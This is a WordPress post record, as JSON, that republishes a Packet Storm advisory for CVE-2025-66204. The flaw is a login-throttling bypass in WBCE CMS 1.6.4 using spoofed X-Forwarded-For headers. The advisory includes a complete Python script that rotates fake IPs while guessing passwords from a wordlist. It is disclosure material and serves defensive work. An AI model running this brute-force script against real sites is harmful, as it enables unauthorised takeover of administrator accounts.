{"id":46307,"date":"2026-04-13T11:50:33","date_gmt":"2026-04-13T11:50:33","guid":{"rendered":"http:\/\/localhost\/?p=46307"},"modified":"2026-04-13T11:50:33","modified_gmt":"2026-04-13T11:50:33","slug":"wbce-cms-164-brute-force","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=46307","title":{"rendered":"\ud83d\udcc4 WBCE CMS 1.6.4 Brute Force_PACKETSTORM:218798"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-13T16:18:19&#8243;,&#8221;description&#8221;:&#8221;WBCE CMS versions 1.6.4 suffers from a brute force protection bypass vulnerability&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 WBCE CMS 1.6.4 Brute Force&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:218798&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-66204&#8243;],&#8221;sourceData&#8221;:&#8221;# CVE-2025-66204: WBCE CMS allows brute-force protection bypass using X-Forwarded-For header\\n    \\n    ## Overview\\n    \\n    | Field | Details |\\n    |&#8212;|&#8212;|\\n    | **CVE ID** | [CVE-2025-66204](https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2025-66204) |\\n    | **Severity** | MEDIUM |\\n    | **Advisory** | [View Advisory](https:\/\/github.com\/WBCE\/WBCE_CMS\/security\/advisories\/GHSA-f676-f375-m7mw) |\\n    | **Discovered by** | [Lukasz Rybak](https:\/\/github.com\/lukasz-rybak) |\\n    \\n    ## Affected Products\\n    \\n    &#8211; **WBCE\/WBCE_CMS**\\n    \\n    \\n    \\n    ## Details\\n    \\n    ### Summary\\n    A brute-force protection bypass exists in WBCE CMS 1.6.4.\\n    The login throttling mechanism blocks an IP address after 5 invalid login attempts.\\n    However, the application fully trusts the X-Forwarded-For header without validating it or restricting its usage.\\n    \\n    By modifying X-Forwarded-For on each request, an attacker can reset the counter indefinitely and gain unlimited password guessing attempts, effectively bypassing all brute-force protection.\\n    \\n    ### Details\\n    WBCE CMS determines the client IP using the following logic:\\n    \\n    1. If the request contains the header X-Forwarded-For, the application blindly trusts its value.\\n    2. Otherwise, it falls back to REMOTE_ADDR.\\n    \\n    Although WBCE is not running behind a reverse proxy by default, the login endpoint still parses X-Forwarded-For whenever it is present, even if added manually by the client.\\n    \\n    Because the application does not verify that the request originates from a trusted proxy, an attacker can inject their own X-Forwarded-For header with any arbitrary IP address.\\n    \\n    This results in:\\n    \\n    &#8211; the attacker sends 5 invalid passwords using X-Forwarded-For: 10.0.0.1 \u2192 that IP is blocked\\n    &#8211; attacker sends next request with X-Forwarded-For: 10.0.0.2 \u2192 treated as a completely new IP\\n    &#8211; brute-force protection can be bypassed indefinitely\\n    \\n    This behavior is reproducible on a clean, default installation with no reverse proxy in front of WBCE CMS.\\n    \\n    ### PoC\\n    Steps\\n    \\n    Attempt login with wrong password and send header:\\n    \\n    X-Forwarded-For: 10.0.0.10\\n    \\n    Repeat until lockout occurs (after 5 attempts).\\n    \\u003cimg width=\\&#8221;1905\\&#8221; height=\\&#8221;845\\&#8221; alt=\\&#8221;image\\&#8221; src=\\&#8221;https:\/\/github.com\/user-attachments\/assets\/69b40271-21ba-48eb-8b14-912087a0a6c2\\&#8221; \/\\u003e\\n    \\n    Change header to:\\n    \\n    X-Forwarded-For: 10.0.0.11\\n    \\n    Login attempts are reset and allowed again.\\n    \\u003cimg width=\\&#8221;1912\\&#8221; height=\\&#8221;921\\&#8221; alt=\\&#8221;image\\&#8221; src=\\&#8221;https:\/\/github.com\/user-attachments\/assets\/bbdad8f5-c7c4-467e-b5f8-fb0650660b4c\\&#8221; \/\\u003e\\n    \\n    \\n    Rotate through 10.0.0.x and brute-force without any limitation.\\n    \\n    Automated PoC Script\\n    \\n    I built a Python script that performs the attack automatically, rotating spoofed IPs every four attempts and detecting successful login.\\n    \\n    \\u003cimg width=\\&#8221;538\\&#8221; height=\\&#8221;406\\&#8221; alt=\\&#8221;image\\&#8221; src=\\&#8221;https:\/\/github.com\/user-attachments\/assets\/ed526674-aa39-4e7b-9f9a-21ac17309525\\&#8221; \/\\u003e\\n    &#8230;\\n    \\u003cimg width=\\&#8221;588\\&#8221; height=\\&#8221;361\\&#8221; alt=\\&#8221;image\\&#8221; src=\\&#8221;https:\/\/github.com\/user-attachments\/assets\/b522c8a8-1905-44c8-a3c3-46fc93042ee8\\&#8221; \/\\u003e\\n    \\n    \\u003cimg width=\\&#8221;445\\&#8221; height=\\&#8221;477\\&#8221; alt=\\&#8221;image\\&#8221; src=\\&#8221;https:\/\/github.com\/user-attachments\/assets\/ba89bb3c-9bee-44c9-9db1-46d5877e40d8\\&#8221; \/\\u003e\\n    \\n    This proves complete bypass of the protection.\\n    \\n    &#8220;`python\\n    import requests\\n    \\n    # ==========================\\n    #  CONFIGURATION\\n    # ==========================\\n    \\n    TARGET_URL = \\&#8221;http:\/\/localhost\/wbce\/admin\/login\/index.php\\&#8221;\\n    USERNAME = \\&#8221;user\\&#8221;\\n    \\n    # Extracted from intercepted login request\\n    USERNAME_FIELDNAME = \\&#8221;username_A9BC72FF1D81\\&#8221;\\n    PASSWORD_FIELDNAME = \\&#8221;password_A9BC72FF1D81\\&#8221;\\n    USERNAME_META_FIELD = \\&#8221;username_fieldname\\&#8221;\\n    PASSWORD_META_FIELD = \\&#8221;password_fieldname\\&#8221;\\n    \\n    WORDLIST = \\&#8221;wordlist.txt\\&#8221;\\n    \\n    ERROR_STRING = \\&#8221;Loginname or password incorrect\\&#8221;\\n    BLOCK_STRING = \\&#8221;Excessive Invalid Logins\\&#8221;\\n    \\n    MAX_ATTEMPTS_PER_IP = 4\\n    SPOOF_IP_BASE = \\&#8221;10.0.0.\\&#8221;\\n    \\n    # Optional Burp Suite proxy\\n    USE_BURP = False\\n    PROXIES = {\\n        \\&#8221;http\\&#8221;: \\&#8221;http:\/\/127.0.0.1:8080\\&#8221;,\\n        \\&#8221;https\\&#8221;: \\&#8221;http:\/\/127.0.0.1:8080\\&#8221;,\\n    }\\n    \\n    session = requests.Session()\\n    if USE_BURP:\\n        session.proxies.update(PROXIES)\\n        session.verify = False\\n    \\n    \\n    # ==========================\\n    #  LOGIN REQUEST\\n    # ==========================\\n    \\n    def try_login(ip, password):\\n        \\&#8221;\\&#8221;\\&#8221;Send one login attempt with spoofed X-Forwarded-For.\\&#8221;\\&#8221;\\&#8221;\\n        headers = {\\n            \\&#8221;X-Forwarded-For\\&#8221;: ip,\\n            \\&#8221;User-Agent\\&#8221;: \\&#8221;WBCE-Bruteforce-POC\\&#8221;,\\n        }\\n    \\n        data = {\\n            USERNAME_META_FIELD: USERNAME_FIELDNAME,\\n            PASSWORD_META_FIELD: PASSWORD_FIELDNAME,\\n            USERNAME_FIELDNAME: USERNAME,\\n            PASSWORD_FIELDNAME: password,\\n            \\&#8221;url\\&#8221;: \\&#8221;\\&#8221;,\\n            \\&#8221;submit\\&#8221;: \\&#8221;Login\\&#8221;,\\n        }\\n    \\n        resp = session.post(TARGET_URL, headers=headers, data=data, allow_redirects=True)\\n        text = resp.text\\n    \\n        failed = ERROR_STRING in text\\n        blocked = BLOCK_STRING in text\\n        success = not failed and not blocked\\n    \\n        return success, failed, blocked, resp\\n    \\n    \\n    # ==========================\\n    #  MAIN ROUTINE\\n    # ==========================\\n    \\n    def main():\\n        print(\\&#8221;[*] Loading wordlist&#8230;\\&#8221;)\\n    \\n        with open(WORDLIST, \\&#8221;r\\&#8221;, encoding=\\&#8221;utf-8\\&#8221;) as f:\\n            passwords = [p.strip() for p in f if p.strip()]\\n    \\n        print(f\\&#8221;[*] Loaded {len(passwords)} passwords.\\\\n\\&#8221;)\\n    \\n        current_ip_counter = 1\\n        attempts_with_ip = 0\\n    \\n        for attempt_no, password in enumerate(passwords, start=1):\\n            ip = f\\&#8221;{SPOOF_IP_BASE}{current_ip_counter}\\&#8221;\\n            success, failed, blocked, resp = try_login(ip, password)\\n    \\n            print(\\n                f\\&#8221;Attempt {attempt_no:03d} | IP={ip} | pass='{password}&#8217; \\&#8221;\\n                f\\&#8221;| failed={failed} blocked={blocked}\\&#8221;\\n            )\\n    \\n            if success:\\n                print(\\&#8221;\\\\n[+] SUCCESSFUL LOGIN!\\&#8221;)\\n                print(f\\&#8221;    Username: {USERNAME}\\&#8221;)\\n                print(f\\&#8221;    Password: {password}\\&#8221;)\\n                print(f\\&#8221;    IP used : {ip}\\&#8221;)\\n                return\\n    \\n            attempts_with_ip += 1\\n    \\n            # Switch spoofed IP after lockout threshold\\n            if attempts_with_ip \\u003e= MAX_ATTEMPTS_PER_IP:\\n                print(f\\&#8221;[*] Switching IP after {MAX_ATTEMPTS_PER_IP} attempts.\\\\n\\&#8221;)\\n                current_ip_counter += 1\\n                attempts_with_ip = 0\\n    \\n        print(\\&#8221;\\\\n[-] Password not found in wordlist.\\&#8221;)\\n    \\n    \\n    if __name__ == \\&#8221;__main__\\&#8221;:\\n        main()\\n    \\n    &#8220;`\\n    \\n    ### Impact\\n    1. Unlimited brute-forcing of any account;\\n    2. Possible compromise of administrator accounts;\\n    3. No rate-limiting enforcement;\\n    \\n    ## References\\n    \\n    &#8211; https:\/\/github.com\/WBCE\/WBCE_CMS\/security\/advisories\/GHSA-f676-f375-m7mw\\n    &#8211; https:\/\/github.com\/WBCE\/WBCE_CMS\/commit\/3765baddf27f31bbbea9c0228c452268621b25e5\\n    &#8211; https:\/\/github.com\/WBCE\/WBCE_CMS\/releases\/tag\/1.6.5\\n    \\n    \\n    ## Disclaimer\\n    \\n    This CVE was responsibly disclosed following coordinated vulnerability disclosure practices. The information provided here is for educational and defensive purposes only.&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/218798&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:8.1,&#8221;severity&#8221;:&#8221;HIGH&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:H\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/218798\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-13T16:18:19&#8243;,&#8221;description&#8221;:&#8221;WBCE CMS versions 1.6.4 suffers from a brute force protection bypass vulnerability&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 WBCE CMS 1.6.4 Brute Force&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:218798&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-66204&#8243;],&#8221;sourceData&#8221;:&#8221;# CVE-2025-66204: WBCE CMS allows brute-force protection bypass using&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,52,12,15,13,53,7,11,5],"class_list":["post-46307","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-81","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 WBCE CMS 1.6.4 Brute Force_PACKETSTORM:218798 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=46307\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 WBCE CMS 1.6.4 Brute Force_PACKETSTORM:218798 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-04-13T16:18:19&#8243;,&#8221;description&#8221;:&#8221;WBCE CMS versions 1.6.4 suffers from a brute force protection bypass vulnerability&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 WBCE CMS 1.6.4 Brute Force&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:218798&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-66204&#8243;],&#8221;sourceData&#8221;:&#8221;# CVE-2025-66204: WBCE CMS allows brute-force protection bypass using...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=46307\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-13T11:50:33+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46307#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46307\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 WBCE CMS 1.6.4 Brute Force_PACKETSTORM:218798\",\"datePublished\":\"2026-04-13T11:50:33+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46307\"},\"wordCount\":1161,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-8.1\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=46307#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46307\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46307\",\"name\":\"\ud83d\udcc4 WBCE CMS 1.6.4 Brute Force_PACKETSTORM:218798 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-13T11:50:33+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46307#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=46307\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46307#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 WBCE CMS 1.6.4 Brute Force_PACKETSTORM:218798\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 WBCE CMS 1.6.4 Brute Force_PACKETSTORM:218798 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=46307","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 WBCE CMS 1.6.4 Brute Force_PACKETSTORM:218798 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-04-13T16:18:19&#8243;,&#8221;description&#8221;:&#8221;WBCE CMS versions 1.6.4 suffers from a brute force protection bypass vulnerability&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 WBCE CMS 1.6.4 Brute Force&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:218798&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-66204&#8243;],&#8221;sourceData&#8221;:&#8221;# CVE-2025-66204: WBCE CMS allows brute-force protection bypass using...","og_url":"https:\/\/zero.redgem.net\/?p=46307","og_site_name":"zero redgem","article_published_time":"2026-04-13T11:50:33+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=46307#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=46307"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 WBCE CMS 1.6.4 Brute Force_PACKETSTORM:218798","datePublished":"2026-04-13T11:50:33+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=46307"},"wordCount":1161,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-8.1","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=46307#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=46307","url":"https:\/\/zero.redgem.net\/?p=46307","name":"\ud83d\udcc4 WBCE CMS 1.6.4 Brute Force_PACKETSTORM:218798 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-04-13T11:50:33+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=46307#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=46307"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=46307#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 WBCE CMS 1.6.4 Brute Force_PACKETSTORM:218798"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/46307","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=46307"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/46307\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=46307"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=46307"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=46307"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}